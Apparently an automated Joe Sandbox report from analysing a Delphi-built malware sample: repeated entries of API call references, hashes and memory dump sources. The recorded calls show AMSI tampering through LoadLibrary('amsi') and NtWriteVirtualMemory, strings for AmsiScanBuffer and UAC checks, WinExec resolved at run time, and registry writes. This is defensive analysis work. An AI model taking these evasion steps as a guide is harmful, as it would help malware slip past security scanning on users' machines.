                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 0ca9bd1b1e55afa0bba095f8255723665db62d9419609990163a9b08d2bfdbe1
                                                                                                                  • Instruction ID: e98d19a584a4a14518f7b71833429673fc6a28459c8dd0196ed9c6544a041184
                                                                                                                  • Opcode Fuzzy Hash: 0ca9bd1b1e55afa0bba095f8255723665db62d9419609990163a9b08d2bfdbe1
                                                                                                                  • Instruction Fuzzy Hash: 3DB15372A203518BCB15CF2CE980315BBF1EB86394F59C6EED65D8B385C735A452CB90

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(amsi), ref: 02B288C1
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                    • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B28920
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                  • String ID: DllGetClassObject$W$amsi
                                                                                                                  • API String ID: 941070894-2671292670
                                                                                                                  • Opcode ID: 73abcdcff65fe1647ab81f3d83f67567c4d9565d551df570b8e744055f09e53f
                                                                                                                  • Instruction ID: e7da6ab78f48232b107c71d9bf42d7596247465db451df0a5cebfbcc025119e1
                                                                                                                  • Opcode Fuzzy Hash: 73abcdcff65fe1647ab81f3d83f67567c4d9565d551df570b8e744055f09e53f
                                                                                                                  • Instruction Fuzzy Hash: 9DF0A45044C381B9E300E3748C45F4BBFCD4B62264F408A98B1ECAA2D2D679D1089B77

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,00000000,02B11FE4), ref: 02B11B17
                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B11FE4), ref: 02B11B31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 2a8360d36b169dacd013ff447331c43ffa879f9cd7675f189318f26dcddb4d92
                                                                                                                  • Instruction ID: ff043b244d0d6a75d583dfe07d5e3ff072b404c752661627741e3c0732ec4baa
                                                                                                                  • Opcode Fuzzy Hash: 2a8360d36b169dacd013ff447331c43ffa879f9cd7675f189318f26dcddb4d92
                                                                                                                  • Instruction Fuzzy Hash: B351EE71A212408FDB15CF6CCA84766BBE0EF4A314F9885EED648CB2C2E774C445CBA1

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B2E5F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CheckConnectionInternet
                                                                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                  • API String ID: 3847983778-3852638603
                                                                                                                  • Opcode ID: 8605150bab238d34b3bb322b5d92511eeb0669703004dc3ed1fa2a87fbb62e13
                                                                                                                  • Instruction ID: fe3f4b3cd23fe1894d469b33237c194177b442188e45fbcf903a8c4e727dda45
                                                                                                                  • Opcode Fuzzy Hash: 8605150bab238d34b3bb322b5d92511eeb0669703004dc3ed1fa2a87fbb62e13
                                                                                                                  • Instruction Fuzzy Hash: 8B413975B002189FEB01EBA4D881ADEB3FAEF88700FA044B6E145E7255DA70FD098F55
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • WinExec.KERNEL32(?,?), ref: 02B28624
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                  • Opcode ID: de4c438d1842c0d53df6f004f92959f147baa97e82033299aa8200b803261e8c
                                                                                                                  • Instruction ID: 474f45942380282da43f5fc0f3f10ac7b2e9ad0c667e0a98645b595e1c511140
                                                                                                                  • Opcode Fuzzy Hash: de4c438d1842c0d53df6f004f92959f147baa97e82033299aa8200b803261e8c
                                                                                                                  • Instruction Fuzzy Hash: 560181B1694314BFEB01EFA4DC01F5A77FDE709700FA084A0F908D3650DA34AD159A25
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • WinExec.KERNEL32(?,?), ref: 02B28624
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                                                                  • String ID: Kernel32$WinExec
                                                                                                                  • API String ID: 2292790416-3609268280
                                                                                                                  • Opcode ID: d0e22067127069d00553c8d87b508e1811c51134550d7c6342ed30fb074124b7
                                                                                                                  • Instruction ID: 78092c23edb0741e8d385a2d3ff20ef1e16d16e6999086907ed04610de41314e
                                                                                                                  • Opcode Fuzzy Hash: d0e22067127069d00553c8d87b508e1811c51134550d7c6342ed30fb074124b7
                                                                                                                  • Instruction Fuzzy Hash: 2CF081B1694314BFEB01EFA4DC01F5A77FDE709700FA084A0F908D3650DA34AD159A25
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25C88
                                                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25CB6
                                                                                                                    • Part of subcall function 02B17D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B23900,02B25CF6,00000000,02B25D74,?,?,02B23900), ref: 02B17DAA
                                                                                                                    • Part of subcall function 02B17F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B23900,02B25D11,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B17FB7
                                                                                                                  • GetLastError.KERNEL32(00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25D1B
                                                                                                                    • Part of subcall function 02B1A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B1C3D9,00000000,02B1C433), ref: 02B1A797
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 503785936-0
                                                                                                                  • Opcode ID: 13e7a98b733bdc4edb4e1f54af0d21bdd78b6129ac47c76101a7bdc9c9f69107
                                                                                                                  • Instruction ID: ff635de6bcd77280b2ddfe74b3658f7c21120d0ea72a1db5e3dac4963f45e944
                                                                                                                  • Opcode Fuzzy Hash: 13e7a98b733bdc4edb4e1f54af0d21bdd78b6129ac47c76101a7bdc9c9f69107
                                                                                                                  • Instruction Fuzzy Hash: 52319570E007189FDB10EFA4C945BDEBBF6AF09700FD041A5E504AB390DB756A058FA1
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02C8BA58), ref: 02B2F258
                                                                                                                  • RegSetValueExA.ADVAPI32(0000086C,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F290
                                                                                                                  • RegCloseKey.ADVAPI32(0000086C,0000086C,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F29B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 779948276-0
                                                                                                                  • Opcode ID: f7ac8511ed67d9011d622b1fb37030d9d1624884c990d6728317bfabeb952f58
                                                                                                                  • Instruction ID: aaf8704048b86ca2001737db9a699a66b180aaff3b6f120fedb44d426fd9641c
                                                                                                                  • Opcode Fuzzy Hash: f7ac8511ed67d9011d622b1fb37030d9d1624884c990d6728317bfabeb952f58
                                                                                                                  • Instruction Fuzzy Hash: 8E110AB1A40208AFEB00EFA8DD81E9E7BFDEB09740B9045A1B614D7655EB30EE448F54
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02C8BA58), ref: 02B2F258
                                                                                                                  • RegSetValueExA.ADVAPI32(0000086C,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F290
                                                                                                                  • RegCloseKey.ADVAPI32(0000086C,0000086C,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F29B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 779948276-0
                                                                                                                  • Opcode ID: 7ee005d2cb1d7f3d4e43fee173dcea621e64e743096c6e28576a293a07628b1c
                                                                                                                  • Instruction ID: c583a64b6425cf91fa3f8dd343c2bc0a43ac95fed810b29f680252759cda958d
                                                                                                                  • Opcode Fuzzy Hash: 7ee005d2cb1d7f3d4e43fee173dcea621e64e743096c6e28576a293a07628b1c
                                                                                                                  • Instruction Fuzzy Hash: 201106B1A40208AFEB00EFA8DD81E9E7BFDEB09740B9045A1B614D7655EB30EE448F54
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClearVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1473721057-0
                                                                                                                  • Opcode ID: a392d9e270fc91b1ba68ab055f0b80df070bc73b3a8ae4f5386a0c57aaab5823
                                                                                                                  • Instruction ID: cf62b1e7ffc386619a5091bbe796d19930a87376fbd5c22f54b4b25ff03de1a5
                                                                                                                  • Opcode Fuzzy Hash: a392d9e270fc91b1ba68ab055f0b80df070bc73b3a8ae4f5386a0c57aaab5823
                                                                                                                  • Instruction Fuzzy Hash: B8F09660718110C7DB2A7B39AD8466D379AAF403407D094F6EC07DB155DF64CC85D762
                                                                                                                  APIs
                                                                                                                  • SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 02B14D5B
                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02B14D6D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 986138563-0
                                                                                                                  • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                  • Instruction ID: 52ec3ed92abf5c86fe2e09f386c8718117f591d01557897fc6ce4818e05abfed
                                                                                                                  • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                  • Instruction Fuzzy Hash: 5FE017F82152056EEF186F25DD40B3B373AEFC2741BE484E9A940CA164DB3CD840AE78
                                                                                                                  APIs
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 02B273DA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeString
                                                                                                                  • String ID: H
                                                                                                                  APIs
                                                                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B1E781
                                                                                                                    • Part of subcall function 02B1E364: VariantClear.OLEAUT32(?), ref: 02B1E373
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCopy
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: InitVariant
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                    • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                    • Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                  • FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9,?,?,?,00000000), ref: 02B26D99
                                                                                                                    • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeFromProgString
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B15886
                                                                                                                    • Part of subcall function 02B15ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B10000,02B3E790), ref: 02B15AE8
                                                                                                                    • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B06
                                                                                                                    • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B24
                                                                                                                    • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B15B42
                                                                                                                    • Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B15B8B
                                                                                                                    • Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001), ref: 02B15BA9
                                                                                                                    • Part of subcall function 02B15ACC: RegCloseKey.ADVAPI32(?,02B15BD8,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B15BCB
                                                                                                                  Similarity
                                                                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B17DF4
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02B3356F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,Initialize), ref: 02B17E8B
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                  • Instruction ID: d7cffd8e024f7b8f43385001079872a4dbc1099a3c00f1deb60213e392578619
                                                                                                                  • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                  • Instruction Fuzzy Hash: 16C08CE22012000A5A5069BC2CC428952CE8B042383F40AE1A438C72E6DB2298A63850
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3341692771-0
                                                                                                                  • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                  • Instruction ID: b8adcb66bebd1b3e48b5fa80b4c996f08707cfa31f9fb7caba0fef6273ec1ac8
                                                                                                                  • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                  • Instruction Fuzzy Hash: 55C012A26102305BEB219AA9ACC0B5262ECDB093A9B9800E1A908DB254E36498008AA0
                                                                                                                  APIs
                                                                                                                  • timeSetEvent.WINMM(00002710,00000000,02B3C350,00000000,00000001), ref: 02B3C36C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Eventtime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2982266575-0
                                                                                                                  • Opcode ID: a137e6f06a96d74b7f3f0bdf43336006e5c015fd4fa38c76e488d3fdd41733e3
